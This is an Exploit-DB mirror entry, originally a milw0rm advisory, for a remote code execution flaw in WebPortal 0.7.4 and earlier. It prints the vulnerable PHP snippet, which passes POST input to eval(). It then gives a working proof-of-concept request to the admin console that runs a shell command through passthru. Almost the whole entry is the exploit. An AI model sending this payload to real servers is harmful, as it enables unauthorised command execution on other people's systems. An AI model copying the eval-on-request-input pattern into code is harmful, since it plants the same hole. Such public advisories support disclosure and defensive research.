exploit-db-mirror/exploits/php/webapps/6544.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
587 B
Text

WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability
Download : http://webportal.ivanoculmine.com/download.php?mid=14
Vuln :
######################################################################
<?
if ($_GET["action"] == "execute") {
eval (stripslashes($_POST["code"]));
}
?>
######################################################################
POC :
/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id);
######################################################################
# milw0rm.com [2008-09-23]